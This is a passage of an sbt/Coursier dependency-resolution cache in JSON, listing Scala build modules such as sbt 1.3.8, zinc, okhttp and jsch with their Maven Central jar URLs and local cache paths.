e\":\"task-system_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"main-settings_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"main-settings_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"gigahorse-core_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"gigahorse-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/gigahorse\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.google.protobuf\",\"name\":\"protobuf-java\",\"revision\":\"3.7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"protobuf-java\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"gigahorse-okhttp_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"gigahorse-okhttp_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/gigahorse\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-scalajson_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-scalajson_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-relation_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-relation_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang.modules\",\"name\":\"scala-xml_2.12\",\"revision\":\"1.2.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-xml_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.spire-math\",\"name\":\"jawn-parser_2.12\",\"revision\":\"0.10.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jawn-parser_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://github.com/non/jawn\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-classpath_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-classpath_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-core_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-compiler\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-compiler\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"net.java.dev.jna\",\"name\":\"jna\",\"revision\":\"4.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jna\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/java-native-access/jna\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"fastparse-utils_2.12\",\"revision\":\"0.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"fastparse-utils_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/scala-parser\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lmax\",\"name\":\"disruptor\",\"revision\":\"3.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"disruptor\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://lmax-exchange.github.com/disruptor\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"tasks_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"tasks_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.reactivestreams\",\"name\":\"reactive-streams\",\"revision\":\"1.0.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"reactive-streams\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.reactive-streams.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.slf4j\",\"name\":\"slf4j-api\",\"revision\":\"1.7.26\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"slf4j-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.slf4j.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.swoval\",\"name\":\"file-tree-views\",\"revision\":\"2.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"file-tree-views\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/swoval/swoval\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okhttp3\",\"name\":\"okhttp\",\"revision\":\"3.14.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okhttp\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"sourcecode_2.12\",\"revision\":\"0.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sourcecode_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/sourcecode\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.jcraft\",\"name\":\"jsch\",\"revision\":\"0.1.54\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsch\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.jcraft.com/jsch/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-scripted_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-scripted_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-cache_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-cache_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-slf4j-impl\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-slf4j-impl\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"net.java.dev.jna\",\"name\":\"jna-platform\",\"revision\":\"4.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jna-platform\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/java-native-access/jna\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"jline\",\"name\":\"jline\",\"revision\":\"2.14.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jline\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"sbt\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.